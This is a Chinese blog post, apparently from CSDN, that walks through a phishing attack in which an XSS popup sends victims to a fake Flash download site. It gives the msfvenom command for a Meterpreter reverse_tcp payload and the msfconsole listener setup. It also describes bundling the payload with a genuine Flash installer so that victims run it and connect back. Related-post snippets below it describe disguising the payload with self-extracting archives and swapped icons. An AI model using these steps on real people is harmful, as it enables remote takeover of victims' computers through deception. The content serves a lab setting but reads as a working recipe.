XSS-flash钓鱼

已于 2024-07-23 19:12:08 修改
阅读量270 收藏 1
点赞数 5
文章标签: xss 网络安全 web安全
于 2024-07-23 18:18:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_69065643/article/details/140642439
版权

一、在本机下载PHPstudy

二、将flash源码文件部署在网址根目录下  网址:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash(选择多的哪个)如下图

三、在xss平台上的公共模块点击flash窗口钓鱼的源码并保存到一个js文件放在根目录下

(网址:XSS平台-XSS测试网站-仅用于安全免费测试

四、将1.js中的代码修改为伪造网站的网址

新建一个1.hmtl 输入如下代码

五、在kali中执行如下代码生成木🐎

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe

生成一个shell.exe

执行一下命令开启监听:
 

 msfconsole
 use exploit/multi/handler
 set payload windows/x64/meterpreter/reverse_tcp
 set lhost 自己ip
 set lport 4444
 run

六、将生成的shell.exe 和 flashcenter_pp_ax_install_cn.exe 压缩一个压缩包(关闭防火墙 病毒实时检测)

改名

如下操作

之后点击确定压缩

七、在第一步下载的文件中打开index.html将下载文件改为我们的flash.exe

8.访问物理机http://ip/i.html

跳转到我们伪装的flash官网页面

点击下载会下载我们的exe文件

运行报毒(我们自己的不怕)继续运行

运行成功后会出现flash的安装界面

查看kali 发现有目标上线

养只小羊7
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xss-flash钓鱼配合msf捆绑上线
weixin_43225966的博客
04-21 946
xss-flash钓鱼配合msf捆绑上线
xss--flash钓鱼
最新发布
2201_75891821的博客
07-23 309
四 新建一个1.js文件 然后在xss平台找到flash弹窗钓鱼 然后查看他的源代码 复制到新建的1.js里面。五.然后在kali里使用msf命令生成shell木马 如下图。当我们安装 上面解压好的那个flash的时候 这里就会显示。三.下载完成把网站部署在phpstudy www根目录下。七.把flash 安装包跟shell.exe一起压缩。六.把shell拖到自己主机桌面 或者根目录下。一.本机下载小皮面板 开启环境。然后在1.js里修改成伪造网站的ip。二.下载flash源文件。
XSS-Flash攻击钓鱼
ineedmoreMuQ的博客
07-23 610
XSS-Flash攻击钓鱼
记录 XSS-Flash攻击钓鱼
starhei.zxy的博客
07-23 730
10.同样的⽅法----ResourceHacker打开刚刚打包好的⽂件,点击Icon Group⽂件夹中的⽂ 件,⿏标右键替换ico图标,最后保存..7.将两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填 写解压路径为 C:\Windows\Temp。8.点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!1.首先在本机phpstudy中开启web服务。
XSS跨站脚本攻击剖析与防御.pdf
05-16
第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马、窃取Cookies、会话劫持到钓鱼欺骗,各种攻击都不容忽视。第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具...
XSS跨站脚本攻击剖析与防御
04-28
第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马、窃取Cookies、会话劫持到钓鱼欺骗,各种攻击都不容忽视。第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具...
XSS跨站脚本gj剖析与防御.pdf
05-13
第2章 XSS利用方式,就当前比较流行的XSS利用方式做了深入的剖析,这些攻击往往基于客户端,从挂马、窃取Cookies、会话劫持到钓鱼欺骗,各种攻击都不容忽视。第3章 XSS测试和利用工具,介绍了一些常见的XSS测试工具...
XSS_Bypass_Cookbook_ver_3.0.pdf
08-07
2.5 上传swf导致flash-xss所产生的bypass 2.6 crlf产生的bypass 3 各类针对关键字过滤的bypass 3.1 过滤特定标签 3.2 通用的敏感关键字绕过方法 3.3 针对特定敏感关键字的绕过方法 3.4 针对某些过滤方法的绕过。 4 ...
记一次因敏感信息泄露而导致的越权+存储型XSS
2301_80127209的博客
07-23 310
可能各位师傅会有苦于不知道如何寻找测试目标的烦恼,这里我惯用的就是寻找可进站的思路。这个思路分为两种,一是弱口令进站测试,二是可注册进站测试。依照这个思路,我依旧是用鹰图进行了一波资产的搜集。
CSRF+XSS组合攻击实战
记录学习
07-19 1341
xss和csrf组合攻击漏洞复现
DVWA靶场超(详细教程)--跨站攻击(XSS+CSRF)
weixin_60838266的博客
07-19 1126
webanquan”去掉了(替换为空),我们的输入从alert变成了alert()
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8344
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“微软蓝屏”事件暴露了网络安全哪些问题?
weixin_62595121的博客
07-22 1767
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。中国国际问题研究院助理研究员 谢卉:私营部门在技术发展和创新上处于前沿,拥有很大的主导权,但是他们现在和公共利益的联系也越来越紧密,因此要加强对私营部门的监管,让他们投资建设更为可靠的网络基础设施,减少由单点故障带来的风险。报道称,英国多家药店的支付功能也一度出现问题。
网络安全科普】勒索病毒 防护指南
a38417的博客
07-20 1266
常规的杀毒软件查找病毒的原理一般是对当前计算机上的文件进行特征的检测,检测完成后和现有的病毒库中的特征数据进行匹配,如果可以匹配成功则找到病毒文件,因此现有的勒索病毒对我们常用的常规杀毒软件是一个很大的挑战。一旦勒索病毒感染了计算机,它会立即开始加密用户的文件,包括文档、图片、视频等,并在屏幕上显示要求用户支付赎金的消息。从操作系统来看被植入病毒的主要是Windows XP、Windows 7,原因是目前这些系统中有一部分微软官方已经不再支持更新、以及补丁的维护,一般会存在较多的无法及时修复的漏洞。
网络安全等级保护制度1.0与2.0的演进与变革
gmqqcsdn的博客
07-23 571
等保1.0是我国在网络安全领域迈出的重要一步,它于2008年正式发布。该版本的等保制度以《信息安全技术 信息系统安全等级保护基本要求》为核心标准,主要聚焦于信息系统的物理安全网络安全、主机安全、应用安全和数据安全等方面的基础防护。等保1.0的实施对于提高我国信息系统的安全防护水平起到了积极的推动作用,但随着网络环境的快速变化和新型威胁的不断出现,等保1.0的局限性也逐渐显现。
2022 年中高职组“网络安全”赛项-海南省省竞赛任务书-1-B模块-B-4Web渗透测试
轻舟已过万重山
07-23 168
通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020 进行渗透测试,通过本地 PC 中渗透测试平台 Kali 对服务器场景 PYsystem2020进行渗透测试,这里因为我们的Web服务器MySQL数据库版本原因,所以我换了台Web服务器,进行测试。将该场景中数据库的版本号作为 FLAG(例如:5.0.22)提交。换的这台Linux的服务器的IP为192。需要提交的flag:【
网络安全----web安全防范
weixin_55357256的博客
07-16 750
以下代码用来防范流行的DDoS攻击,ARP欺骗,CC攻击,XXS攻击,对输入的恶意代码进行过滤,嵌入到web程序可以很好的防范网络攻击,但如果想要更好的防范网络攻击,还需要更加复杂的配置和更硬核的硬件。print(f"可能的 CC 攻击针对资源 {resource} 检测到")# 用于检测 CC 攻击的函数(简单示例,通过监测短时间内对同一资源的请求频率)# 用于检测 XSS 攻击的函数(简单示例,检查输入中是否存在可疑脚本标签)# 用于检测 DDoS 攻击的函数(简单示例,通过监测短时间内的连接数量)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值